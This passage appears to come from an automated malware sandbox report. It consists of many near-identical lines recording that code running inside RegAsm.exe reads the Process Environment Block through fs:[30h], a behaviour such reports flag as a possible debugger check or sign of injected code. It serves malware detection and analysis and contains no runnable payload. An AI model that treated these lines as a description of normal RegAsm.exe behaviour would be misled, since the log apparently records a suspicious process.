                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B5208A mov eax, dword ptr fs:[00000030h]7_2_02B5208A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B4C0F0 mov eax, dword ptr fs:[00000030h]7_2_02B4C0F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B920F0 mov ecx, dword ptr fs:[00000030h]7_2_02B920F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B750E4 mov eax, dword ptr fs:[00000030h]7_2_02B750E4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B750E4 mov ecx, dword ptr fs:[00000030h]7_2_02B750E4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B4A0E3 mov ecx, dword ptr fs:[00000030h]7_2_02B4A0E3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B580E9 mov eax, dword ptr fs:[00000030h]7_2_02B580E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02BD20DE mov eax, dword ptr fs:[00000030h]7_2_02BD20DE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B790DB mov eax, dword ptr fs:[00000030h]7_2_02B790DB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B670C0 mov eax, dword ptr fs:[00000030h]7_2_02B670C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B670C0 mov ecx, dword ptr fs:[00000030h]7_2_02B670C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B670C0 mov ecx, dword ptr fs:[00000030h]7_2_02B670C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B670C0 mov eax, dword ptr fs:[00000030h]7_2_02B670C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B670C0 mov ecx, dword ptr fs:[00000030h]7_2_02B670C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B670C0 mov ecx, dword ptr fs:[00000030h]7_2_02B670C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B670C0 mov eax, dword ptr fs:[00000030h]7_2_02B670C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B670C0 mov eax, dword ptr fs:[00000030h]7_2_02B670C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B670C0 mov eax, dword ptr fs:[00000030h]7_2_02B670C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B670C0 mov eax, dword ptr fs:[00000030h]7_2_02B670C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B670C0 mov eax, dword ptr fs:[00000030h]7_2_02B670C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B670C0 mov eax, dword ptr fs:[00000030h]7_2_02B670C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B670C0 mov eax, dword ptr fs:[00000030h]7_2_02B670C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B670C0 mov eax, dword ptr fs:[00000030h]7_2_02B670C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B670C0 mov eax, dword ptr fs:[00000030h]7_2_02B670C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B670C0 mov eax, dword ptr fs:[00000030h]7_2_02B670C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B670C0 mov eax, dword ptr fs:[00000030h]7_2_02B670C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B670C0 mov eax, dword ptr fs:[00000030h]7_2_02B670C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02C160B8 mov eax, dword ptr fs:[00000030h]7_2_02C160B8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02C160B8 mov ecx, dword ptr fs:[00000030h]7_2_02C160B8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02BCD0C0 mov eax, dword ptr fs:[00000030h]7_2_02BCD0C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02BCD0C0 mov eax, dword ptr fs:[00000030h]7_2_02BCD0C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B4A020 mov eax, dword ptr fs:[00000030h]7_2_02B4A020
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B4C020 mov eax, dword ptr fs:[00000030h]7_2_02B4C020
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B6E016 mov eax, dword ptr fs:[00000030h]7_2_02B6E016
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B6E016 mov eax, dword ptr fs:[00000030h]7_2_02B6E016
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B6E016 mov eax, dword ptr fs:[00000030h]7_2_02B6E016
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B6E016 mov eax, dword ptr fs:[00000030h]7_2_02B6E016
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02C25060 mov eax, dword ptr fs:[00000030h]7_2_02C25060
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B7C073 mov eax, dword ptr fs:[00000030h]7_2_02B7C073
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B61070 mov eax, dword ptr fs:[00000030h]7_2_02B61070
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B61070 mov ecx, dword ptr fs:[00000030h]7_2_02B61070
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B61070 mov eax, dword ptr fs:[00000030h]7_2_02B61070
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B61070 mov eax, dword ptr fs:[00000030h]7_2_02B61070
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B61070 mov eax, dword ptr fs:[00000030h]7_2_02B61070
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B61070 mov eax, dword ptr fs:[00000030h]7_2_02B61070
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B61070 mov eax, dword ptr fs:[00000030h]7_2_02B61070
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B61070 mov eax, dword ptr fs:[00000030h]7_2_02B61070
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B61070 mov eax, dword ptr fs:[00000030h]7_2_02B61070
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B61070 mov eax, dword ptr fs:[00000030h]7_2_02B61070
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B61070 mov eax, dword ptr fs:[00000030h]7_2_02B61070
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B61070 mov eax, dword ptr fs:[00000030h]7_2_02B61070
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B61070 mov eax, dword ptr fs:[00000030h]7_2_02B61070
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02BCD070 mov ecx, dword ptr fs:[00000030h]7_2_02BCD070
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02BF705E mov ebx, dword ptr fs:[00000030h]7_2_02BF705E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02BF705E mov eax, dword ptr fs:[00000030h]7_2_02BF705E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B52050 mov eax, dword ptr fs:[00000030h]7_2_02B52050
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B7B052 mov eax, dword ptr fs:[00000030h]7_2_02B7B052
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02C1903E mov eax, dword ptr fs:[00000030h]7_2_02C1903E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02C1903E mov eax, dword ptr fs:[00000030h]7_2_02C1903E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02C1903E mov eax, dword ptr fs:[00000030h]7_2_02C1903E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02C1903E mov eax, dword ptr fs:[00000030h]7_2_02C1903E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02C161C3 mov eax, dword ptr fs:[00000030h]7_2_02C161C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02C161C3 mov eax, dword ptr fs:[00000030h]7_2_02C161C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B6B1B0 mov eax, dword ptr fs:[00000030h]7_2_02B6B1B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02C251CB mov eax, dword ptr fs:[00000030h]7_2_02C251CB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02BD019F mov eax, dword ptr fs:[00000030h]7_2_02BD019F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02BD019F mov eax, dword ptr fs:[00000030h]7_2_02BD019F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02BD019F mov eax, dword ptr fs:[00000030h]7_2_02BD019F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02BD019F mov eax, dword ptr fs:[00000030h]7_2_02BD019F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B4A197 mov eax, dword ptr fs:[00000030h]7_2_02B4A197
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B4A197 mov eax, dword ptr fs:[00000030h]7_2_02B4A197
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B4A197 mov eax, dword ptr fs:[00000030h]7_2_02B4A197
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02C261E5 mov eax, dword ptr fs:[00000030h]7_2_02C261E5
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02BA7190 mov eax, dword ptr fs:[00000030h]7_2_02BA7190
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B90185 mov eax, dword ptr fs:[00000030h]7_2_02B90185
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B801F8 mov eax, dword ptr fs:[00000030h]7_2_02B801F8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02C0C188 mov eax, dword ptr fs:[00000030h]7_2_02C0C188
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02C0C188 mov eax, dword ptr fs:[00000030h]7_2_02C0C188
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B751EF mov eax, dword ptr fs:[00000030h]7_2_02B751EF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B751EF mov eax, dword ptr fs:[00000030h]7_2_02B751EF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B751EF mov eax, dword ptr fs:[00000030h]7_2_02B751EF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B751EF mov eax, dword ptr fs:[00000030h]7_2_02B751EF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B751EF mov eax, dword ptr fs:[00000030h]7_2_02B751EF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B751EF mov eax, dword ptr fs:[00000030h]7_2_02B751EF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B751EF mov eax, dword ptr fs:[00000030h]7_2_02B751EF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B751EF mov eax, dword ptr fs:[00000030h]7_2_02B751EF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B751EF mov eax, dword ptr fs:[00000030h]7_2_02B751EF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B751EF mov eax, dword ptr fs:[00000030h]7_2_02B751EF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B751EF mov eax, dword ptr fs:[00000030h]7_2_02B751EF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B751EF mov eax, dword ptr fs:[00000030h]7_2_02B751EF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B751EF mov eax, dword ptr fs:[00000030h]7_2_02B751EF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B551ED mov eax, dword ptr fs:[00000030h]7_2_02B551ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02C011A4 mov eax, dword ptr fs:[00000030h]7_2_02C011A4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02C011A4 mov eax, dword ptr fs:[00000030h]7_2_02C011A4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02C011A4 mov eax, dword ptr fs:[00000030h]7_2_02C011A4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02C011A4 mov eax, dword ptr fs:[00000030h]7_2_02C011A4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B8D1D0 mov eax, dword ptr fs:[00000030h]7_2_02B8D1D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B8D1D0 mov ecx, dword ptr fs:[00000030h]7_2_02B8D1D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B4B136 mov eax, dword ptr fs:[00000030h]7_2_02B4B136
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B4B136 mov eax, dword ptr fs:[00000030h]7_2_02B4B136
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B4B136 mov eax, dword ptr fs:[00000030h]7_2_02B4B136
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B4B136 mov eax, dword ptr fs:[00000030h]7_2_02B4B136
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B51131 mov eax, dword ptr fs:[00000030h]7_2_02B51131
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B51131 mov eax, dword ptr fs:[00000030h]7_2_02B51131
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02C25152 mov eax, dword ptr fs:[00000030h]7_2_02C25152
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B80124 mov eax, dword ptr fs:[00000030h]7_2_02B80124
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02BFA118 mov ecx, dword ptr fs:[00000030h]7_2_02BFA118
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02BFA118 mov eax, dword ptr fs:[00000030h]7_2_02BFA118
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02BFA118 mov eax, dword ptr fs:[00000030h]7_2_02BFA118
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02BFA118 mov eax, dword ptr fs:[00000030h]7_2_02BFA118
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B4F172 mov eax, dword ptr fs:[00000030h]7_2_02B4F172
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B4F172 mov eax, dword ptr fs:[00000030h]7_2_02B4F172
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B4F172 mov eax, dword ptr fs:[00000030h]7_2_02B4F172
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B4F172 mov eax, dword ptr fs:[00000030h]7_2_02B4F172
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B4F172 mov eax, dword ptr fs:[00000030h]7_2_02B4F172
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B4F172 mov eax, dword ptr fs:[00000030h]7_2_02B4F172
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B4F172 mov eax, dword ptr fs:[00000030h]7_2_02B4F172
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B4F172 mov eax, dword ptr fs:[00000030h]7_2_02B4F172
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B4F172 mov eax, dword ptr fs:[00000030h]7_2_02B4F172
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B4F172 mov eax, dword ptr fs:[00000030h]7_2_02B4F172
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B4F172 mov eax, dword ptr fs:[00000030h]7_2_02B4F172
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B4F172 mov eax, dword ptr fs:[00000030h]7_2_02B4F172
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B4F172 mov eax, dword ptr fs:[00000030h]7_2_02B4F172
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B4F172 mov eax, dword ptr fs:[00000030h]7_2_02B4F172
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B4F172 mov eax, dword ptr fs:[00000030h]7_2_02B4F172
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B4F172 mov eax, dword ptr fs:[00000030h]7_2_02B4F172
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B4F172 mov eax, dword ptr fs:[00000030h]7_2_02B4F172
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B4F172 mov eax, dword ptr fs:[00000030h]7_2_02B4F172
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B4F172 mov eax, dword ptr fs:[00000030h]7_2_02B4F172
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B4F172 mov eax, dword ptr fs:[00000030h]7_2_02B4F172
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B4F172 mov eax, dword ptr fs:[00000030h]7_2_02B4F172
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02BE9179 mov eax, dword ptr fs:[00000030h]7_2_02BE9179
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02C10115 mov eax, dword ptr fs:[00000030h]7_2_02C10115
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B56154 mov eax, dword ptr fs:[00000030h]7_2_02B56154
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B56154 mov eax, dword ptr fs:[00000030h]7_2_02B56154
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B4C156 mov eax, dword ptr fs:[00000030h]7_2_02B4C156
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B57152 mov eax, dword ptr fs:[00000030h]7_2_02B57152
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02BE4144 mov eax, dword ptr fs:[00000030h]7_2_02BE4144
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02BE4144 mov eax, dword ptr fs:[00000030h]7_2_02BE4144
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02BE4144 mov ecx, dword ptr fs:[00000030h]7_2_02BE4144
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02BE4144 mov eax, dword ptr fs:[00000030h]7_2_02BE4144
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02BE4144 mov eax, dword ptr fs:[00000030h]7_2_02BE4144
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B49148 mov eax, dword ptr fs:[00000030h]7_2_02B49148
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B49148 mov eax, dword ptr fs:[00000030h]7_2_02B49148
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B49148 mov eax, dword ptr fs:[00000030h]7_2_02B49148
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B49148 mov eax, dword ptr fs:[00000030h]7_2_02B49148
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B476B2 mov eax, dword ptr fs:[00000030h]7_2_02B476B2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B476B2 mov eax, dword ptr fs:[00000030h]7_2_02B476B2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B476B2 mov eax, dword ptr fs:[00000030h]7_2_02B476B2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02C0F6C7 mov eax, dword ptr fs:[00000030h]7_2_02C0F6C7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B866B0 mov eax, dword ptr fs:[00000030h]7_2_02B866B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02C116CC mov eax, dword ptr fs:[00000030h]7_2_02C116CC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02C116CC mov eax, dword ptr fs:[00000030h]7_2_02C116CC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02C116CC mov eax, dword ptr fs:[00000030h]7_2_02C116CC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02C116CC mov eax, dword ptr fs:[00000030h]7_2_02C116CC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B4D6AA mov eax, dword ptr fs:[00000030h]7_2_02B4D6AA
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B4D6AA mov eax, dword ptr fs:[00000030h]7_2_02B4D6AA
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B8C6A6 mov eax, dword ptr fs:[00000030h]7_2_02B8C6A6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B54690 mov eax, dword ptr fs:[00000030h]7_2_02B54690
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B54690 mov eax, dword ptr fs:[00000030h]7_2_02B54690
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02C0D6F0 mov eax, dword ptr fs:[00000030h]7_2_02C0D6F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02BD368C mov eax, dword ptr fs:[00000030h]7_2_02BD368C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02BD368C mov eax, dword ptr fs:[00000030h]7_2_02BD368C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02BD368C mov eax, dword ptr fs:[00000030h]7_2_02BD368C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02BD368C mov eax, dword ptr fs:[00000030h]7_2_02BD368C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02BD06F1 mov eax, dword ptr fs:[00000030h]7_2_02BD06F1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02BD06F1 mov eax, dword ptr fs:[00000030h]7_2_02BD06F1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02BCE6F2 mov eax, dword ptr fs:[00000030h]7_2_02BCE6F2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02BCE6F2 mov eax, dword ptr fs:[00000030h]7_2_02BCE6F2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02BCE6F2 mov eax, dword ptr fs:[00000030h]7_2_02BCE6F2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02BCE6F2 mov eax, dword ptr fs:[00000030h]7_2_02BCE6F2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02BE36EE mov eax, dword ptr fs:[00000030h]7_2_02BE36EE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02BE36EE mov eax, dword ptr fs:[00000030h]7_2_02BE36EE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02BE36EE mov eax, dword ptr fs:[00000030h]7_2_02BE36EE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02BE36EE mov eax, dword ptr fs:[00000030h]7_2_02BE36EE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02BE36EE mov eax, dword ptr fs:[00000030h]7_2_02BE36EE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02BE36EE mov eax, dword ptr fs:[00000030h]7_2_02BE36EE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02B7D6E0 mov eax, dword ptr fs:[00000030h]7_2_02B7D6E0
